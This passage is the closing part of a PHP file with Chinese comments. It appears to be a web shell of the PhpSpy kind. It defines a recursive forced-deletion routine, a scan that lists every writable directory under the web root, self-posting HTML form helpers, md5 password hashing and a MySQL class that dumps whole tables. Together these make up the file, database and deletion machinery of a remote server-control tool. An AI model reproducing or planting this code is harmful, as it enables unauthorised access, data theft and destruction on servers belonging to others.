1208        $dirs = array_diff($dirs, array('..', '.'));
1209        foreach ($dirs as $file) {  
1210            if((is_dir($deldir.'/'.$file))) {
1211                @chmod($deldir.'/'.$file,0777);
1212                deltree($deldir.'/'.$file); 
1213            } else {
1214                @chmod($deldir.'/'.$file,0777);
1215                @unlink($deldir.'/'.$file);
1216            }
1217        }
1218        @chmod($deldir,0777);
1219        return @rmdir($deldir) ? 1 : 0;
1220    } else {
1221        return 0;
1222    }
1223}
1224// 表格行间的背景色替换
1225function bg() {
1226    global $bgc;
1227    return ($bgc++%2==0) ? 'alt1' : 'alt2';
1228}
1229function cmp($a, $b) {
1230    global $sort;
1231    if(is_numeric($a[$sort[0]])) {
1232        return (($a[$sort[0]] &lt; $b[$sort[0]]) ? -1 : 1)*($sort[1]?1:-1);
1233    } else {
1234        return strcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1);
1235    }
1236}
1237// 获取当前目录的上级目录
1238function getUpPath($cwd) {
1239    $pathdb = explode('/', $cwd);
1240    $num = count($pathdb);
1241    if ($num &gt; 2) {
1242        unset($pathdb[$num-1],$pathdb[$num-2]);
1243    }
1244    $uppath = implode('/', $pathdb).'/';
1245    $uppath = str_replace('//', '/', $uppath);
1246    return $uppath;
1247}
1248// 检查PHP配置参数
1249function getcfg($varname) {
1250    $result = get_cfg_var($varname);
1251    if ($result == 0) {
1252        return 'No';
1253    } elseif ($result == 1) {
1254        return 'Yes';
1255    } else {
1256        return $result;
1257    }
1258}
1259// 获得文件扩展名
1260function getext($file) {
1261    $info = pathinfo($file);
1262    return $info['extension'];
1263}
1264function GetWDirList($path){
1265    global $dirdata,$j,$web_cwd;
1266    !$j &amp;&amp; $j=1;
1267    $dirs = @scandir($path);
1268    if ($dirs) {
1269        $dirs = array_diff($dirs, array('..','.'));
1270        foreach ($dirs as $file) {
1271            $f=str_replace('//','/',$path.'/'.$file);
1272            if(is_dir($f)){
1273                if (is_writable($f)) {
1274                    $dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f);
1275                    $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1276                    $dirdata[$j]['chmod']=getChmod($f);
1277                    $dirdata[$j]['perm']=PermsColor($f);
1278                    $dirdata[$j]['owner']=getUser($f);
1279                    $dirdata[$j]['link']=$f;
1280                    $j++;
1281                }
1282                GetWDirList($f);
1283            }
1284        }
1285        return $dirdata;
1286    } else {
1287        return array();
1288    }
1289}
1290function sizecount($size) {
1291    $unit = array('Bytes', 'KB', 'MB', 'GB', 'TB','PB');
1292    for ($i = 0; $size &gt;= 1024 &amp;&amp; $i &lt; 5; $i++) {
1293        $size /= 1024;
1294    }
1295    return round($size, 2).' '.$unit[$i];
1296}
1297function p($str){
1298    echo $str."\n";
1299}
1300function makehide($name,$value=''){
1301    p("&lt;input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" /&gt;");
1302}
1303function makeinput($arg = array()){
1304    $arg['size'] = isset($arg['size']) &amp;&amp; $arg['size'] &gt; 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
1305    $arg['type'] = isset($arg['type']) ? $arg['type'] : 'text';
1306    $arg['title'] = isset($arg['title']) ? $arg['title'].'&lt;br /&gt;' : '';
1307    $arg['class'] = isset($arg['class']) ? $arg['class'] : 'input';
1308    $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1309    $arg['value'] = isset($arg['value']) ? $arg['value'] : '';
1310    if (isset($arg['newline'])) p('&lt;p&gt;');
1311    p("$arg[title]&lt;input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] /&gt;");
1312    if (isset($arg['newline'])) p('&lt;/p&gt;');
1313}
1314function makeselect($arg = array()){
1315    $onchange = isset($arg['onchange']) ? 'onchange="'.$arg['onchange'].'"' : '';
1316    $arg['title'] = isset($arg['title']) ? $arg['title'] : '';
1317    $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1318    p("$arg[title] &lt;select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange&gt;");
1319        if (is_array($arg['option'])) {
1320            foreach ($arg['option'] as $key=&gt;$value) {
1321                if ($arg['selected']==$key) {
1322                    p("&lt;option value=\"$key\" selected&gt;$value&lt;/option&gt;");
1323                } else {
1324                    p("&lt;option value=\"$key\"&gt;$value&lt;/option&gt;");
1325                }
1326            }
1327        }
1328    p("&lt;/select&gt;");
1329}
1330function formhead($arg = array()) {
1331    !isset($arg['method']) &amp;&amp; $arg['method'] = 'post';
1332    !isset($arg['name']) &amp;&amp; $arg['name'] = 'form1';
1333    $arg['extra'] = isset($arg['extra']) ? $arg['extra'] : '';
1334    $arg['onsubmit'] = isset($arg['onsubmit']) ? "onsubmit=\"$arg[onsubmit]\"" : '';
1335    p("&lt;form name=\"$arg[name]\" id=\"$arg[name]\" action=\"".SELF."\" method=\"$arg[method]\" $arg[onsubmit] $arg[extra]&gt;");
1336    if (isset($arg['title'])) {
1337        p('&lt;h2&gt;'.$arg['title'].' »&lt;/h2&gt;');
1338    }
1339}
1340    
1341function maketext($arg = array()){
1342    $arg['title'] = isset($arg['title']) ? $arg['title'].'&lt;br /&gt;' : '';
1343    $arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1344    p("&lt;p&gt;$arg[title]&lt;textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"100\" rows=\"25\"&gt;$arg[value]&lt;/textarea&gt;&lt;/p&gt;");
1345}
1346function formfooter($name = ''){
1347    !$name &amp;&amp; $name = 'submit';
1348    p('&lt;p&gt;&lt;input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="提交"&gt;&lt;/p&gt;');
1349    p('&lt;/form&gt;');
1350}
1351function goback(){
1352    global $cwd, $charset;
1353    p('&lt;form action="'.SELF.'" method="post"&gt;&lt;input type="hidden" name="act" value="file" /&gt;&lt;input type="hidden" name="cwd" value="'.$cwd.'" /&gt;&lt;input type="hidden" name="charset" value="'.$charset.'" /&gt;&lt;p&gt;&lt;input class="bt" type="submit" value="返回"&gt;&lt;/p&gt;&lt;/form&gt;');
1354}
1355function formfoot(){
1356    p('&lt;/form&gt;');
1357}
1358function encode_pass($pass) {
1359    $pass = md5($pass);
1360    return $pass;
1361}
1362function pr($a) {
1363    p('&lt;div style="text-align: left;border:1px solid #ddd;"&gt;&lt;pre&gt;'.print_r($a).'&lt;/pre&gt;&lt;/div&gt;');
1364}
1365class DB_MySQL  {
1366    var $querycount = 0;
1367    var $link;
1368    var $charsetdb = array();
1369    var $charset = '';
1370    function connect($dbhost, $dbuser, $dbpass, $dbname='') {
1371        @ini_set('mysql.connect_timeout', 5);
1372        if(!$this-&gt;link = @mysql_connect($dbhost, $dbuser, $dbpass, 1)) {
1373            $this-&gt;halt('Can not connect to MySQL server');
1374        }
1375        if($this-&gt;version() &gt; '4.1') {
1376            $this-&gt;setcharset($this-&gt;charset);
1377        }
1378        $dbname &amp;&amp; mysql_select_db($dbname, $this-&gt;link);
1379    }
1380    function setcharset($charset) {
1381        if ($charset &amp;&amp; $this-&gt;charsetdb[$charset]) {
1382            if(function_exists('mysql_set_charset')) {
1383                mysql_set_charset($this-&gt;charsetdb[$charset], $this-&gt;link);
1384            } else {
1385                $this-&gt;query("SET character_set_connection='".$this-&gt;charsetdb[$charset]."', character_set_results='".$this-&gt;charsetdb[$charset]."', character_set_client=binary");
1386            }
1387        }
1388    }
1389    function select_db($dbname) {
1390        return mysql_select_db($dbname, $this-&gt;link);
1391    }
1392    function geterrdesc() {
1393        return (($this-&gt;link) ? mysql_error($this-&gt;link) : mysql_error());
1394    }
1395    function geterrno() {
1396        return intval(($this-&gt;link) ? mysql_errno($this-&gt;link) : mysql_errno());
1397    }
1398    function fetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM
1399        return mysql_fetch_array($query, $result_type);
1400    }
1401    function query($sql) {
1402        //echo '&lt;p style="color:#f00;"&gt;'.$sql.'&lt;/p&gt;';
1403        if(!($query = mysql_query($sql, $this-&gt;link))) {
1404            $this-&gt;halt('MySQL Query Error', $sql);
1405        }
1406        $this-&gt;querycount++;
1407        return $query;
1408    }
1409    function query_res($sql) { 
1410        $res = '';
1411        if(!$res = mysql_query($sql, $this-&gt;link)) { 
1412            $res = 0;
1413        } else if(is_resource($res)) {
1414            $res = 1; 
1415        } else {
1416            $res = 2;
1417        }
1418        $this-&gt;querycount++;
1419        return $res;
1420    }
1421    function num_rows($query) {
1422        $query = mysql_num_rows($query);
1423        return $query;
1424    }
1425    function num_fields($query) {
1426        $query = mysql_num_fields($query);
1427        return $query;
1428    }
1429    function affected_rows() {
1430        return mysql_affected_rows($this-&gt;link);
1431    }
1432    function result($query, $row) {
1433        $query = mysql_result($query, $row);
1434        return $query;
1435    }   
1436    function free_result($query) {
1437        $query = mysql_free_result($query);
1438        return $query;
1439    }
1440    function version() {
1441        return mysql_get_server_info($this-&gt;link);
1442    }
1443    function close() {
1444        return mysql_close($this-&gt;link);
1445    }
1446    function halt($msg =''){
1447        echo "&lt;h2&gt;".htmlspecialchars($msg)."&lt;/h2&gt;\n";
1448        echo "&lt;p class=\"b\"&gt;Mysql error description: ".htmlspecialchars($this-&gt;geterrdesc())."&lt;/p&gt;\n";
1449        echo "&lt;p class=\"b\"&gt;Mysql error number: ".$this-&gt;geterrno()."&lt;/p&gt;\n";
1450        exit;
1451    }
1452    function get_fields_meta($result) {
1453        $fields = array();
1454        $num_fields = $this-&gt;num_fields($result);
1455        for ($i = 0; $i &lt; $num_fields; $i++) {
1456            $field = mysql_fetch_field($result, $i);
1457            $fields[] = $field;
1458        }
1459        return $fields;
1460    }
1461    function sqlAddSlashes($s = ''){
1462        $s = str_replace('\\', '\\\\', $s);
1463        $s = str_replace('\'', '\'\'', $s);
1464        return $s;
1465    }
1466    // 备份数据库
1467    function sqldump($table, $fp=0) {
1468        $crlf = (IS_WIN ? "\r\n" : "\n");
1469        $search = array("\x00", "\x0a", "\x0d", "\x1a"); //\x08\\x09, not required
1470        $replace = array('\0', '\n', '\r', '\Z');
1471        if (isset($this-&gt;charset) &amp;&amp; isset($this-&gt;charsetdb[$this-&gt;charset])) {
1472            $set_names = $this-&gt;charsetdb[$this-&gt;charset];
1473        } else {
1474            $set_names = $this-&gt;charsetdb['utf-8'];
1475        }
1476        $tabledump = 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf;
1477        $tabledump .= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf
1478               . '/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf
1479               . '/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf
1480               . '/*!40101 SET NAMES ' . $set_names . ' */;'.$crlf.$crlf;
1481        $tabledump .= "DROP TABLE IF EXISTS `$table`;".$crlf;
1482        $res = $this-&gt;query("SHOW CREATE TABLE $table");
1483        $create = $this-&gt;fetch($res, MYSQL_NUM);
1484        $tabledump .= $create[1].';'.$crlf.$crlf;
1485        if (strpos($tabledump, "(\r\n ")) {
1486            $tabledump = str_replace("\r\n", $crlf, $tabledump);
1487        } elseif (strpos($tabledump, "(\n ")) {
1488            $tabledump = str_replace("\n", $crlf, $tabledump);
1489        } elseif (strpos($tabledump, "(\r ")) {
1490            $tabledump = str_replace("\r", $crlf, $tabledump);
1491        }
1492        unset($create);
1493        if ($fp) {
1494            fwrite($fp,$tabledump);
1495        } else {
1496            echo $tabledump;
1497        }
1498        $tabledump = '';
1499        $rows = $this-&gt;query("SELECT * FROM $table");
1500        $fields_cnt = $this-&gt;num_fields($rows);
1501        $fields_meta = $this-&gt;get_fields_meta($rows);
1502        while ($row = $this-&gt;fetch($rows, MYSQL_NUM)) {
1503            for ($j = 0; $j &lt; $fields_cnt; $j++) {
1504                if (!isset($row[$j]) || is_null($row[$j])) {
1505                    $values[] = 'NULL';
1506                } elseif ($fields_meta[$j]-&gt;numeric &amp;&amp; $fields_meta[$j]-&gt;type != 'timestamp' &amp;&amp; !$fields_meta[$j]-&gt;blob) {
1507                    $values[] = $row[$j];
1508                } elseif ($fields_meta[$j]-&gt;blob) {
1509                    if (empty($row[$j]) &amp;&amp; $row[$j] != '0') {
1510                        $values[] = '\'\'';
1511                    } else {
1512                        $values[] = '0x'.bin2hex($row[$j]);
1513                    }
1514                } else {
1515                    $values[] = '\''.str_replace($search, $replace, $this-&gt;sqlAddSlashes($row[$j])).'\'';
1516                }
1517            }
1518            $tabledump = 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf;
1519            unset($values);
1520            if ($fp) {
1521                fwrite($fp,$tabledump);
1522            } else {
1523                echo $tabledump;
1524            }
1525        }
1526        $this-&gt;free_result($rows);
1527    }
1528}
1529?>